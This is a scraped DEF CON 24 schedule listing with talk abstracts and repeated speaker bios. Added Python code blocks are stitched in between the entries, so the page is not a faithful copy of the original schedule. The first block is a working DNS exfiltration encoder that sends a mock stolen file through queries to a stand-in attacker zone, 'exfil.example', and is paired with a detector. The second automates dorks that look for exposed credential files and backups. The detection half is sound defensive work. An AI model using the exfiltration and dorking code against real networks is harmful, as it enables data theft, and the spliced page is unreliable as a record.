KURT OPSAHL is the Deputy Executive Director and General Counsel of the Electronic Frontier Foundation. In addition to representing clients on civil liberties, free speech and privacy law, Opsahl counsels on EFF projects and initiatives. Opsahl is the lead attorney on the Coders' Rights Project. Before joining EFF, Opsahl worked at Perkins Coie, where he represented technology clients with respect to intellectual property, privacy, defamation, and other online liability matters, including working on Kelly v. Arribasoft, MGM v. Grokster and CoStar v. LoopNet. For his work responding to government subpoenas, Opsahl is proud to have been called a "rabid dog" by the Department of Justice. Prior to Perkins, Opsahl was a research fellow to Professor Pamela Samuelson at the U.C. Berkeley School of Information Management & Systems. Opsahl received his law degree from Boalt Hall, and undergraduate degree from U.C. Santa Cruz. Opsahl co-authored "Electronic Media and Privacy Law Handbook." In 2007, Opsahl was named as one of the "Attorneys of the Year" by California Lawyer magazine for his work on the O'Grady v. Superior Court appeal. In 2014, Opsahl was elected to the USENIX Board of Directors.
NATE CARDOZO is a Senior Staff Attorney on the Electronic Frontier Foundation's digital civil liberties team. In addition to his focus on free speech and privacy litigation, Nate works on EFF's Who Has Your Back? report and Coders' Rights Project. Nate has projects involving cryptography and the law, automotive privacy, government transparency, hardware hacking rights, anonymous speech, electronic privacy law reform, Freedom of Information Act litigation, and resisting the expansion of the surveillance state. A 2009-2010 EFF Open Government Legal Fellow, Nate spent two years in private practice before returning to his senses and to EFF in 2012. Nate has a B.A. in Anthropology and Politics from U.C. Santa Cruz and a J.D. from U.C. Hastings where he has taught first-year legal writing and moot court. He brews his own beer, has been to India four times, and watches too much Bollywood.
ANDREW CROCKER is a staff attorney on the Electronic Frontier Foundation's civil liberties team. He focuses on EFF's national security and privacy docket, as well as the Coders' Rights Project. While in law school, Andrew worked at the Berkman Center for Internet and Society, the American Civil Liberties Union's Speech, Privacy, and Technology Project, and the Center for Democracy and Technology. He received his undergraduate and law degrees from Harvard University and an M.F.A. in creative writing from New York University. His interests include Boggle and donuts.
DR. JEREMY GILLULA is a Staff Technologist at the Electronic Frontier Foundation where he focuses on a wide variety of tech policy topics including net neutrality, big data, mobile privacy, and privacy issues associated with drones and autonomous vehicles. At a young age Jeremy was sidetracked from his ultimate goal of protecting digital civil liberties by the allure of building and programming robots. He went to Caltech for undergrad, where he spent four years participating in the DARPA Grand Challenge, a competition to create a vehicle capable of traversing the desert autonomously. He then got his PhD in computer science from Stanford University, where his research focused on the design and analysis of algorithms for guaranteeing the safety of systems that employ machine learning and other AI techniques in an online fashion.
EVA GALPERIN is EFF's Global Policy Analyst, and has been instrumental in highlighting government malware designed to spy upon activists around the world. A lifelong geek, Eva misspent her youth working as a Systems Administrator all over Silicon Valley. Since then, she has seen the error of her ways and earned degrees in Political Science and International Relations from SFSU. She comes to EFF from the US-China Policy Institute, where she researched Chinese energy policy, helped to organize conferences, and attempted to make use of her rudimentary Mandarin skills.
KATITZA RODRIGUEZ is EFF's international rights director. She concentrates on comparative policy of international privacy issues, with special emphasis on law enforcement, government surveillance, and cross-border data flows. Her work in EFF's International Program also focuses on cybersecurity at the intersection of human rights. Katitza also manages EFF's growing Latin American programs. She is an advisor to the UN Internet Governance Forum (2009-2010), and a member of the Advisory Board of Privacy International. Before joining EFF, Katitza was director of the international privacy program at the Electronic Privacy Information Center in Washington D.C., where amongst other things, she worked on The Privacy and Human Rights Report, an international survey of privacy law and developments. Katitza is well known to many in global civil society and in international policy venues for her work at the U.N. Internet Governance Forum and her pivotal role in the creation and ongoing success of the Civil Society Information Society Advisory Council at the Organisation for Economic Co-operation and Development, for which she served as the civil society liaison while at EPIC from 2008 to March 2010. Katitza holds a Bachelor of Law degree from the University of Lima, Peru. Katitza's twitter handle is @txitua.
Social media links if provided:
@EFF
DEFCON - Track Three - Saturday - 16:30-16:59
Ask the EFF
Kurt Opsahl Deputy Executive Director, General Counsel, EFF
Nate Cardozo Senior Staff Attorney, EFF
Andrew Crocker Staff attorney, EFF
Dr. Jeremy Gillula Staff Technologist, EFF
Eva Galperin Global Policy Analyst, EFF
Katitza Rodriguez International rights director, EFF
Get the latest information about how the law is racing to catch up with technological change from staffers at the Electronic Frontier Foundation, the nation’s premier digital civil liberties group fighting for freedom and privacy in the computer age. This session will include updates on current EFF issues such as surveillance online, encryption (and backdoors), and fighting efforts to use intellectual property claims to shut down free speech and halt innovation, discussion of our technology project to protect privacy and speech online, updates on cases and legislation affecting security research, and much more. Half the session will be given over to question-and-answer, so it's your chance to ask EFF questions about the law and technology issues that are important to you.
KURT OPSAHL is the Deputy Executive Director and General Counsel of the Electronic Frontier Foundation. In addition to representing clients on civil liberties, free speech and privacy law, Opsahl counsels on EFF projects and initiatives. Opsahl is the lead attorney on the Coders' Rights Project. Before joining EFF, Opsahl worked at Perkins Coie, where he represented technology clients with respect to intellectual property, privacy, defamation, and other online liability matters, including working on Kelly v. Arribasoft, MGM v. Grokster and CoStar v. LoopNet. For his work responding to government subpoenas, Opsahl is proud to have been called a "rabid dog" by the Department of Justice. Prior to Perkins, Opsahl was a research fellow to Professor Pamela Samuelson at the U.C. Berkeley School of Information Management & Systems. Opsahl received his law degree from Boalt Hall, and undergraduate degree from U.C. Santa Cruz. Opsahl co-authored "Electronic Media and Privacy Law Handbook." In 2007, Opsahl was named as one of the "Attorneys of the Year" by California Lawyer magazine for his work on the O'Grady v. Superior Court appeal. In 2014, Opsahl was elected to the USENIX Board of Directors.
NATE CARDOZO is a Senior Staff Attorney on the Electronic Frontier Foundation’s digital civil liberties team. In addition to his focus on free speech and privacy litigation, Nate works on EFF's Who Has Your Back? report and Coders' Rights Project. Nate has projects involving cryptography and the law, automotive privacy, government transparency, hardware hacking rights, anonymous speech, electronic privacy law reform, Freedom of Information Act litigation, and resisting the expansion of the surveillance state. A 2009-2010 EFF Open Government Legal Fellow, Nate spent two years in private practice before returning to his senses and to EFF in 2012. Nate has a B.A. in Anthropology and Politics from U.C. Santa Cruz and a J.D. from U.C. Hastings where he has taught first-year legal writing and moot court. He brews his own beer, has been to India four times, and watches too much Bollywood.
ANDREW CROCKER is a staff attorney on the Electronic Frontier Foundation’s civil liberties team. He focuses on EFF’s national security and privacy docket, as well as the Coders' Rights Project. While in law school, Andrew worked at the Berkman Center for Internet and Society, the American Civil Liberties Union’s Speech, Privacy, and Technology Project, and the Center for Democracy and Technology. He received his undergraduate and law degrees from Harvard University and an M.F.A. in creative writing from New York University. His interests include Boggle and donuts.
DR. JEREMY GILLULA is a Staff Technologist at the Electronic Frontier Foundation where he focuses on a wide variety of tech policy topics including net neutrality, big data, mobile privacy, and privacy issues associated with drones and autonomous vehicles. At a young age Jeremy was sidetracked from his ultimate goal of protecting digital civil liberties by the allure of building and programming robots. He went to Caltech for undergrad, where he spent four years participating in the DARPA Grand Challenge, a competition to create a vehicle capable of traversing the desert autonomously. He then got his PhD in computer science from Stanford University, where his research focused on the design and analysis of algorithms for guaranteeing the safety of systems that employ machine learning and other AI techniques in an online fashion.
EVA GALPERIN is EFF's Global Policy Analyst, and has been instrumental in highlighting government malware designed to spy upon activists around the world. A lifelong geek, Eva misspent her youth working as a Systems Administrator all over Silicon Valley. Since then, she has seen the error of her ways and earned degrees in Political Science and International Relations from SFSU. She comes to EFF from the US-China Policy Institute, where she researched Chinese energy policy, helped to organize conferences, and attempted to make use of her rudimentary Mandarin skills.
KATITZA RODRIGUEZ is EFF's international rights director. She concentrates on comparative policy of international privacy issues, with special emphasis on law enforcement, government surveillance, and cross-border data flows. Her work in EFF's International Program also focuses on cybersecurity at the intersection of human rights. Katitza also manages EFF's growing Latin American programs. She is an advisor to the UN Internet Governance Forum (2009-2010), and a member of the Advisory Board of Privacy International. Before joining EFF, Katitza was director of the international privacy program at the Electronic Privacy Information Center in Washington D.C., where amongst other things, she worked on The Privacy and Human Rights Report, an international survey of privacy law and developments. Katitza is well known to many in global civil society and in international policy venues for her work at the U.N. Internet Governance Forum and her pivotal role in the creation and ongoing success of the Civil Society Information Society Advisory Council at the Organisation for Economic Co-operation and Development, for which she served as the civil society liaison while at EPIC from 2008 to March 2010. Katitza holds a Bachelor of Law degree from the University of Lima, Peru. Katitza's twitter handle is @txitua.
DEFCON - Track One - Sunday - 12:00-12:59
Attacking BaseStations - an Odyssey through a Telco's Network
Hendrik Schmidt IT Security Researcher, ERNW GmbH
Brian Butterly IT Security Researcher, ERNW GmbH
As introduced in our former series of talks ‘LTE vs. Darwin’, there are quite a few holes in the LTE specs. Now, having our own Macro BaseStation (an eNodeB) on the desk, we will demonstrate practical approaches to and attacks on real life devices. More and more devices are using mobile radio networks such as GSM, UMTS and LTE, and there has already been quite a bit of research on (in)securities on the radio part, but only few people have had a look behind the scenes. Luckily, we had the chance to have just this look and now we would like to raise the curtain for the community. Initially we will quickly cover our complete odyssey from starting up an eNodeB for the first time, checking out the available interfaces and emulating the core network through to starting attacks. In the main part of the talk we will give a rather practical insight into the (in-)security features of basestations. We will start with valid backend connections and how these connections can be abused to reconfigure both a single eNodeB and a complete subnet on a telco network. We will then continue with the ‘official’ maintenance approach with the vendor's tools and web interfaces giving an attacker both local and remote access to the device. All in all the talk will cover general and specific vulnerabilities in both basestations and the backend network.
Hendrik Schmidt and Brian Butterly are seasoned security researchers with vast experience in large and complex enterprise networks. Over the years they have focused on evaluating and reviewing all kinds of network protocols and applications. They love to play with packets and use them for their own purposes. In this context they learned how to play around with telecommunication networks, and wrote protocol fuzzers and spoofers for testing their implementation and security architecture. Both are pentesters and consultants at the German-based ERNW GmbH and will happily share their knowledge with the audience.
BHV - Skyview 4 - Saturday - 11:00-11:59
Speaker: Michael Hudson
chap.cl
About Michael Hudson:
Michael Hudson is the founder of CHAP Security, of which he is currently the Executive Director. He is also CEO of INTROEXON Ltda, a company that develops software for medical platforms, doing research and development in information security and the protection of patient data and medical charts (HCE). With over 10 years dedicated to computer security, he specializes in malware analysis and vulnerability research. His experience also includes Host Intrusion Detection Systems (HIDS) and over 6 years of experience in international security consulting for governments, the military and individuals. Special thanks to the whole team of Hospital Bernardino Rivadavia (Capital Federal, Argentina), to the Saturday Emergency Medical Team, my dear Dra. Noemi Garro, the Hospital Dr. Juan A. Fernandez and my entire development team. Thanks to the unwavering support of his girlfriend and life partner Ingrid.
Abstract:
Today healthcare tends to technologize its practice in an incredible way, but there is a problem... Those who are contracted to build the entire architecture of networks, servers and iCloud are not experts in information security, and so the day comes when a doctor asks: where is my patient?
This talk will demonstrate how easy it can be to get patient data, change medical records, delete them from the system, etc. And all thanks to the poor development policies of big companies engaged in the development of medical platforms.
DEFCON - DEF CON 101 - Saturday - 12:00-12:59
Attacking Network Infrastructure to Generate a 4 Tb/s DDoS for $5
Luke Young Information Security Engineer, Hydrant Labs LLC
As bandwidth, computing power, and software advancements have improved over the years, we've begun to see larger and larger DDoS attacks against organizations. Oftentimes these attacks employ techniques such as DNS Amplification to take advantage of servers with very large uplinks. This talk explores a similar technique targeting commonly used throughput testing software typically running on very large uplinks. We will explore the process of attacking this software, eventually compromising it and gaining root access. Then we'll explore some of these servers in the real world, determining the size of their uplinks and calculating the total available bandwidth at our fingertips, all from a $5 VPS. We will finish up the presentation with a live demo exploiting an instance and launching a DoS.
Luke Young is a security researcher from the frozen plains of Minnesota who has spent his last three summers escaping to the much warmer Bay Area as a security intern for various tech companies, most recently as part of the Uber product security team. He presented at DEF CON 23 on the topic of exploiting bitflips in memory and has investigated a variety of well-known products and network protocols resulting in numerous CVE assignments and recognition in security Hall of Fames. He is currently attempting to balance earning his undergraduate degree with maintaining his position as one of the top 10 researchers on Bugcrowd.
WOS - Skyview 6 - Saturday - 14:10-14:59
Attacks on Enterprise Social Media
Mike Raggo, Chief Research Scientist at ZeroFOX
Current threat vectors show targeted attacks on social media accounts owned by enterprises and their employees. Most organizations lack a defense-in-depth strategy to address the evolving social media threat landscape. The attacks are outside their network, commonly occur through their employees' personal accounts, and circumvent existing detection technologies. In this presentation we'll explore the taxonomy of social media impersonation attacks, phishing scams, information leakage, espionage, and more. We'll then provide a method to categorize these threats and develop a methodology for adapting existing incident response processes to encompass social media threats for your organization.
Michael T. Raggo (Twitter: @MikeRaggo) has over 20 years of security research experience. Michael is the author of “Mobile Data Loss: Threats & Countermeasures" and “Data Hiding: Exposing Concealed Data in Multimedia, Operating Systems, Mobile Devices and Network Protocols" for Syngress Books, and contributing author for “Information Security the Complete Reference 2nd Edition". A former security trainer, Michael has briefed international defense agencies including the FBI and Pentagon, is a participating member of FSISAC/BITS, and is a frequent presenter at security conferences, including Black Hat, DEF CON, Gartner, RSA, DoD Cyber Crime, OWASP, HackCon, and SANS.
BHV - Skyview 4 - Sunday - 13:00-13:59
Speaker: Michael Zaytsev
@HighNY_
meetup.com/HighNY
linkedin.com/in/michaelzaytsev
About Michael Zaytsev:
Immigrant raised in Brooklyn, NY. Worked in corporate America. Now I'm a life coach and Cannabis community organizer.
Cannabis is a powerful technology and it has not been hacked nearly enough, mostly because for a long time it's been illegal to do so in meaningful ways. Industrial hemp can be used for over 20,000 purposes, yet there are significant challenges to processing it. Cannabis medicine has effectively treated dozens of ailments, yet precise dosing and predictable effects have yet to be developed. Legalization is creating a number of policy questions: how do we police impaired driving? How do we make sure the powers that be don't create a new system that is racially biased and completely unjust?
DEFCON - DEF CON 101 - Sunday - 15:00-15:59
Auditing 6LoWPAN Networks using Standard Penetration Testing Tools
Jonathan-Christofer Demay Airbus Defence and Space
Adam Reziouk
Arnaud Lebrun
The Internet of Things is expected to be involved in the near future in all major aspects of our modern society. On that front, we argue that 6LoWPAN is a protocol that will be a dominant player as it is the only IoT-capable protocol that brings a full IP stack to the smallest devices. As evidence of this, we can highlight the fact that even the latest ZigBee Smart Energy standard is based on ZigBee IP which itself relies on 6LoWPAN, a competitor of the initial ZigBee protocol. Efficient IP-based penetration testing tools have been available to security auditors for years now. However, it is not that easy to use them in the context of a 6LoWPAN network since you need to be able to join it first. In fact, the difficult part is to associate with the underlying IEEE 802.15.4 infrastructure.
Indeed, this standard has already had two iterations since its release in 2003 and it provides several possibilities regarding network topology, data transfer model and security suite. Unfortunately, there is no off-the-shelf component that provides, out of the box, such a wide range of capabilities. Worse still, some of them deviate from the standard and can only communicate with components from the same manufacturer. In this paper, we present the ARSEN project: Advanced Routing for 6LoWPAN and Ethernet Networks. It provides security auditors with two new tools.
First, a radio scanner capable of identifying IEEE 802.15.4 infrastructures and, for each one of them, their specificities, including several deviations from the standard that we encountered in actual security audits.
Secondly, a border router capable of routing IPv6 datagrams between Ethernet and 6LoWPAN networks while adapting to the specificities identified by the scanner. As a result, the combination of both effectively allows security auditors to use available IP-based penetration testing tools on different 6LoWPAN networks.
Jonathan-Christofer Demay, PhD is the current penetration testing team leader at AIRBUS Defence and Space. As a former academic researcher, he has been working on IDS bypassing, intrusion detection and general network security. Now a consultant for various key industries and government bodies, he is working on incident response, penetration testing and social engineering.
Adam Reziouk is an electronics and automation engineer currently working on wireless communications and industrial network security at AIRBUS Defence and Space. He holds a master's degree in electrical and electronic engineering and has been conducting vulnerability research activities on programmable logic controllers, connected devices and smart grids.
Arnaud Lebrun is a command and control engineer currently working at AIRBUS Defence and Space. He is focusing on security issues for several projects in the aerospace industry and related areas such as radioactive waste disposal facilities or large telescopes. He also supports the penetration testing team for perimeters that include ICS infrastructures or embedded electronics.
Return to Index
SkyTalks - Skyview 3 - Friday - 10:00-10:59
Speakers: Nolan Berry, Towne Besel
Talk: Automated DNS Data Exfiltration and Mitigation
Exploiting the trust people place in port 53 to exfiltrate data from a compromised network. How to do it, how to detect it on your network and how to mitigate it.
Return to Index
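As an added illustration of the two halves of the talk above (packing data into DNS queries, then detecting it), not code from the speakers: a Python sketch that encodes bytes into query names under a hypothetical attacker-controlled zone `exfil.example`, reassembles them the way the receiving authoritative server would, and then runs a length-plus-entropy detector over a constructed query log. The log format, the thresholds and the naive "last two labels" registered-domain split are assumptions for the demo.

```python
import base64
import hashlib
import math
import re
from collections import defaultdict

MAX_LABEL = 63   # RFC 1035: one label is at most 63 octets
MAX_NAME = 253   # RFC 1035: a full name is at most 253 characters in text form


def encode_chunks(data: bytes, domain: str, labels_per_name: int = 3) -> list:
    """Client side: base32 (case-insensitive, DNS-safe alphabet) -> 63-char labels
    -> a few labels per query, each name prefixed with a sequence number so the
    receiving server can reorder chunks that arrive out of order."""
    b32 = base64.b32encode(data).decode().rstrip("=").lower()
    labels = [b32[i:i + MAX_LABEL] for i in range(0, len(b32), MAX_LABEL)]
    names = []
    for seq, i in enumerate(range(0, len(labels), labels_per_name)):
        name = ".".join([str(seq)] + labels[i:i + labels_per_name] + [domain])
        if len(name) > MAX_NAME:
            raise ValueError("name too long; reduce labels_per_name")
        names.append(name)
    return names


def decode_chunks(names: list, domain: str) -> bytes:
    """Server side (authoritative name server for `domain`): strip the zone,
    order by sequence number, undo the base32."""
    pieces = {}
    for name in names:
        labels = name[: -(len(domain) + 1)].split(".")
        pieces[int(labels[0])] = "".join(labels[1:])
    b32 = "".join(pieces[k] for k in sorted(pieces)).upper()
    return base64.b32decode(b32 + "=" * (-len(b32) % 8))


def shannon_entropy(text: str) -> float:
    counts = defaultdict(int)
    for ch in text:
        counts[ch] += 1
    n = len(text)
    return -sum(c / n * math.log2(c / n) for c in counts.values()) if n else 0.0


def split_name(qname: str):
    """Naive split into (everything below the registered domain, registered
    domain). A real deployment would use the public suffix list."""
    labels = qname.rstrip(".").split(".")
    return "".join(labels[:-2]), ".".join(labels[-2:])


# Assumed log format for the demo: "<timestamp> <client> query <qtype> <qname>"
LOG_RE = re.compile(r"^(?P<ts>\S+) (?P<src>\S+) query (?P<qtype>\S+) (?P<qname>\S+)$")


def score_query(qname: str, min_prefix_len: int = 40, min_entropy: float = 3.5) -> bool:
    """One query looks like exfil if the part below the registered domain is both
    long and high-entropy. Neither alone is enough: CDN hostnames are high-entropy
    but short, and long descriptive hostnames are low-entropy."""
    prefix, _ = split_name(qname)
    return len(prefix) >= min_prefix_len and shannon_entropy(prefix) >= min_entropy


def find_suspicious(log_lines, **thresholds) -> dict:
    """Aggregate per (client, registered domain): flagged queries and how many
    characters rode out in query names. Returns only the offending pairs."""
    stats = defaultdict(lambda: {"queries": 0, "flagged": 0, "prefix_bytes": 0})
    for line in log_lines:
        m = LOG_RE.match(line)
        if not m:
            continue
        prefix, domain = split_name(m["qname"])
        st = stats[(m["src"], domain)]
        st["queries"] += 1
        st["prefix_bytes"] += len(prefix)
        st["flagged"] += score_query(m["qname"], **thresholds)
    return {k: v for k, v in stats.items() if v["flagged"]}


# Constructed sample: a deterministic 192-byte blob standing in for a stolen file,
# plus a few benign lookups from the same client.
SECRET = b"".join(hashlib.sha256(bytes([i])).digest() for i in range(6))
EXFIL_DOMAIN = "exfil.example"   # hypothetical attacker-controlled zone
SAMPLE_LOG = [
    "2016-08-05T10:00:01 10.0.0.5 query A www.example.com.",
    "2016-08-05T10:00:02 10.0.0.5 query A e3191.dscg.akamaiedge.net.",
    "2016-08-05T10:00:03 10.0.0.5 query AAAA outlook.office365.com.",
] + [f"2016-08-05T10:00:0{4 + i} 10.0.0.5 query TXT {n}."
     for i, n in enumerate(encode_chunks(SECRET, EXFIL_DOMAIN))]

if __name__ == "__main__":
    for key, st in find_suspicious(SAMPLE_LOG).items():
        print(key, st)
```

The detector only exists if the queries are logged, so the first mitigation is structural: block direct port 53 egress and force clients through an internal resolver you can log and filter on. The (client, domain) pairs the detector returns are then what you block at that resolver; a baseline of per-domain query rates and unique-subdomain counts catches slower exfiltration that keeps each individual name under the thresholds above.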
WOS - Skyview 6 - Friday - 16:10-16:59
Automated Dorking for Fun and Profit^WSalary
Filip Reesalu, Security Researcher at Recorded Future
A dork is a specialized search engine query which reveals unintentional data leaks and vulnerable server configurations. In order to catalogue vulnerable hosts with minimal manual intervention we're now introducing an open-source framework for grabbing newly published dorks from various sources and continuously executing them in order to establish a database of exposed hosts. A similar project (SearchDiggity, closed source, Windows only) had its latest release in 2013 and the latest blog post was published in 2014.
Filip Reesalu (Twitter: @p1dgeon) is a Security Researcher at Recorded Future. He joined the Threat Intelligence team after switching over from a data scientist role and is now responsible for analyzing malware samples and traffic as well as creating tools that benefit the community at large.
Return to Index
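As an added example, not the framework introduced in the talk above: a Python sketch of the core of such a pipeline. It parses dork lines in the usual `operator:value` and quoted-phrase syntax into predicates, runs them against crawl records, and produces the host-to-findings database. The dork feed and the crawl records are constructed for the demo; a real run would pull the feed from public dork sources and the records from a search API or your own crawl of in-scope hosts.

```python
import re
from collections import defaultdict
from urllib.parse import urlparse

# Constructed feed in the one-query-per-line, '#'-comment form that public dork
# lists use. These are generic dorks written for this demo.
DORK_FEED = """
# directory listings exposing backup archives
intitle:"index of" inurl:backup
# exposed phpinfo() pages
intitle:phpinfo "PHP Version"
# dotenv files with credentials
filetype:env "DB_PASSWORD"
"""

# -term, operator:term, operator:"quoted phrase", "quoted phrase", bare term
TOKEN_RE = re.compile(r'(-?)(?:(\w+):)?(?:"([^"]*)"|(\S+))')


def parse_dork(dork: str) -> list:
    """One dork -> list of (negated, operator, value). Unqualified terms get
    the implicit operator 'intext'. Values are lower-cased for matching."""
    terms = []
    for neg, op, quoted, bare in TOKEN_RE.findall(dork):
        value = quoted if quoted else bare
        terms.append((neg == "-", (op or "intext").lower(), value.lower()))
    return terms


def term_matches(page: dict, op: str, value: str) -> bool:
    url = page["url"].lower()
    parsed = urlparse(url)
    host = parsed.hostname or ""
    if op == "intitle":
        return value in page.get("title", "").lower()
    if op == "inurl":
        return value in url
    if op == "site":
        return host == value or host.endswith("." + value)
    if op in ("filetype", "ext"):
        name = parsed.path.rsplit("/", 1)[-1]
        return "." in name and name.rsplit(".", 1)[-1] == value
    if op == "intext":
        return value in page.get("body", "").lower()
    raise ValueError(f"unsupported operator {op!r}")


def page_matches(page: dict, terms: list) -> bool:
    # every term must hold, with '-' terms inverted
    return all(term_matches(page, op, v) != neg for neg, op, v in terms)


def load_feed(text: str) -> list:
    return [l.strip() for l in text.splitlines()
            if l.strip() and not l.lstrip().startswith("#")]


def run_dorks(feed_text: str, pages: list) -> dict:
    """Build the exposed-host database: host -> [(dork, url), ...]."""
    exposed = defaultdict(list)
    for dork in load_feed(feed_text):
        terms = parse_dork(dork)
        for page in pages:
            if page_matches(page, terms):
                exposed[urlparse(page["url"]).hostname].append((dork, page["url"]))
    return dict(exposed)


# Constructed crawl records standing in for search-engine results.
PAGES = [
    {"url": "http://files.corp.example/backup/", "title": "Index of /backup",
     "body": "Parent Directory db-2016-07.tar.gz"},
    {"url": "http://www.corp.example/", "title": "Corp Example", "body": "Welcome"},
    {"url": "http://dev.corp.example/info.php", "title": "phpinfo()",
     "body": "PHP Version 5.6.3"},
    {"url": "http://dev.corp.example/.env", "title": "", "body": "DB_PASSWORD=changeme"},
    {"url": "http://shop.example.net/backup/index.html", "title": "Backup page",
     "body": "Back up your data"},
]

if __name__ == "__main__":
    for host, findings in run_dorks(DORK_FEED, PAGES).items():
        print(host, findings)
```

Running a public dork feed against your own crawl (or a search API scoped with `site:` to domains you are authorised to test) turns the same tooling into continuous exposure monitoring; the parser is the part that has to be robust, since feeds mix operators, quoting styles and negation freely.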
Demolabs - Table 4 - Saturday - 12:00-13:50
Automated Penetration Toolkit (APT2)
Adam Compton
Nearly every penetration test begins the same way: run an Nmap scan, review the results, choose interesting services to enumerate and attack, and perform post-exploitation activities. What was once a fairly time-consuming manual process is now automated!
Automated Penetration Testing Toolkit (APT2) is an extendable modular framework designed to automate common tasks performed during penetration testing. APT2 can chain data gathered from different modules together to build dynamic attack paths. Starting with an Nmap scan of the target environment, discovered ports and services become triggers for the various modules, which in turn can fire additional triggers. Have FTP, Telnet, or SSH? APT2 will attempt common authentication. Have SMB? APT2 determines what OS and looks for shares and other information. Modules include everything from enumeration, scanning, brute forcing, and even integration with Metasploit. Come check out how APT2 will save you time on every engagement.
Adam Compton has been a programmer, researcher, professional pentester, and farmer. Adam has over 15 years of programming, network security, incident response, security assessment, and penetration testing experience. Throughout Adam's career, he has worked for both federal and international government agencies as well as within various aspects of the private sector.
Return to Index
CPV - Bronze 2 - Sunday - 12:30-13:00
Talk Title:
Backdooring Cryptocurrencies: The Underhanded Crypto Contest Winners
Speaker Name, Employer or position:
Taylor Hornby, Adam Caudill
Abstract:
The Underhanded Crypto Contest is an annual competition that brings out the best ways of subtly inserting weaknesses into cryptography protocols and software. By understanding how adversarially-crafted weaknesses go unnoticed, we get better at discovering these errors in our designs and code. In this talk we present the technical details of the best one or two contest entries.
Bio:
Taylor is known for his carefully-written security tools, including a side-channel-free password generator and a cryptography library for PHP. He regularly contributes to a number of open source projects by security auditing and reviewing source code. As a recent graduate of the University of Calgary, his research is focused on exploit defense mechanisms and side-channel attacks. In his spare time, he enjoys studying physics from a computer science perspective and is an organizer of the Underhanded Crypto Contest.
Adam Caudill is a security consultant with over 15 years of experience in security and software development; with a focus on application security, secure communications, and cryptography. Active blogger, open source contributor, and advocate for user privacy and protection. His work has been cited by many media outlets and publications around the world, from CNN to Wired and countless others.
Social media links if provided:
@UnderCrypto
Return to Index
DEFCON - Track Three - Sunday - 13:00-13:59
Backdooring the Frontdoor
Jmaxxz Hacker
As our homes become smarter and more connected we come up with new ways of reasoning about our privacy and security. Vendors promise security, but provide little technical information to back up their claims. Further complicating the matter, many of these devices are closed systems which can be difficult to assess. This talk will explore the validity of claims made by one smart lock manufacturer about the security of their product. The entire solution will be deconstructed and examined all the way from web services to the lock itself. By exploiting multiple vulnerabilities Jmaxxz will demonstrate not only how to backdoor a front door, but also how to utilize these same techniques to protect your privacy.
Jmaxxz works as a software engineer for a Fortune 100 company, and is a security researcher for pleasure. His FlashHacker program was featured in Lifehacker's most popular free downloads of 2010. More recently he has contributed to the node_pcap project which allows interfacing with libpcap from node. His other interests include lock picking and taking things apart.
Twitter: @jmaxxz
Return to Index
DEFCON - DEF CON 101 - Thursday - 12:00-12:59
Beyond the MCSE: Red Teaming Active Directory
Sean Metcalf Founder & Security Principal, Trimarc
Active Directory (AD) is leveraged by 95% of the Fortune 1000 companies for its directory, authentication, and management capabilities, so why do red teams barely scratch the surface when it comes to leveraging the data it contains? This talk skips over the standard intro to Active Directory fluff and dives right into the compelling offensive information useful to a Red Teamer, such as quickly identifying target systems and accounts. AD can yield a wealth of information if you know the right questions to ask. This presentation ventures into areas many didn't know existed and leverages capability to quietly identify interesting accounts & systems, identify organizations the target company does business with regularly, build target lists without making a sound, abuse misconfigurations/existing trusts, and quickly discover the most interesting shares and their location. PowerShell examples and AD defense evasion techniques are provided throughout the talk.
Let's go beyond the MCSE and take a different perspective on the standard AD recon and attack tactics.
Sean Metcalf is founder and principal security consultant at Trimarc (www.TrimarcSecurity.com), an information security consulting firm focused on improving enterprise security. He is one of about 100 people in the world who holds the Microsoft Certified Master Directory Services (MCM) certification, is a Microsoft MVP, and has presented on Active Directory attack and defense at BSides, Shakacon, Black Hat, DEF CON, and DerbyCon security conferences. Sean has provided Active Directory and security expertise to government, corporate, and educational entities since Active Directory was released. He currently provides security consulting services to customers and regularly posts interesting Active Directory security information on his blog, ADSecurity.org.
Twitter: @PyroTek3
Return to Index
BHV - Skyview 4 - Saturday - 11:00-11:59
Speaker: Jeffrey Tibbetts
About Jeffrey:
Jeffrey Tibbetts is a Biohacker, blogger, body mod artist and nurse out of Southern California. He’s been a collaborator on projects ranging from insufflatable peptides that extend REM sleep to non-Newtonian armor implants. He placed 3rd in the Biohack Village Oxytocin Poker Tournament and performed an implant on transhumanist presidential candidate Zoltan Istvan. Jeff hosts the annual event, “Grindfest” in Tehachapi California which New York Times states is for “the real transhumanists.” He shares his lab space with two fantastic cats, Chango and Grumpus, as well as two merely acceptable cats, Binky and Mildew.
Abstract:
Over the past decade, the ways we pursue human improvement have become increasingly invasive. We’ve so far been fortunate, but it’s likely if not inevitable that a death will occur due to biohacking. This presentation discusses the many precautions being taken by biohackers to make our procedures and projects as safe as possible.
Return to Index
BHV - Skyview 4 - Friday - 18:00-18:59
Speakers: Dr. Stan Naydin and Vlad Gostomelsky
About Dr. Stan Naydin:
Dr. Stan Naydin is in residency for neurology with specialization in neuro-critical care and neurointerventional medicine. He has a background in pharmaceutical science and is heavily focused on procedure-based medicine. He has been involved in a multitude of advanced surgeries and interventions: partial liver resections, vascular transplants, joint replacements, breast augmentation, and neurological interventions including vascular stenting, aneurysm coiling and ventriculostomies. Prior to transitioning to the medical field, Stan was an industrial robotics designer and programmer in the glass industry.
About Vlad Gostomelsky:
Vlad Gostomelsky is a driven security researcher with a passion for securing technology that makes civilized life possible. He is particularly focused on satellite systems security, SCADA systems supporting the critical infrastructure and wireless networks.
He specializes in the intersection of physical and network security. He has worked on DARPA projects, established and led penetration testing teams for Fortune 50 organizations, performed incident response and forensics on sensitive production systems within controlled environments, reverse engineered security devices, and participated in countless red team engagements for banks, critical infrastructure, pharmaceutical companies, law firms and research organizations. Vlad has spoken at various security conferences including BSides, DEF CON, HOPE, and ShmooCon. Vlad was a board member for NYC OWASP and remains committed to the security community working together to improve the security posture through developer education, end user training, peer-reviewed code and rigorous standardized testing methodologies.
Abstract:
Working as a physician, Dr. Naydin has experience ranging from being first assist in the operating room and primary surgeon in the cath lab for neurointerventional procedures, to seeing post-surgical complications in outpatients, to admitting people in the ED. With the world of biohacking and implanting hardware expanding, post-surgical complications are also increasing in number. He will show pictures and share his experiences with such complications. He has experience with patients having ischemic strokes and losing an entire hemisphere of their brain, infected pacemakers requiring surgical revision, infected breast implants, and complicated knee replacements. As we modify our own bodies, we as hackers have to be mindful of our own mortal limitations. Along with sharing his experiences, he would like to provide some insight into what to look out for. When do you cut your losses and get to the ED?
Return to Index
BHV - Skyview 4 - Friday - 12:00-12:59
Speaker: Renee Wegrzyn and Doug Weber
About Renee Wegrzyn:
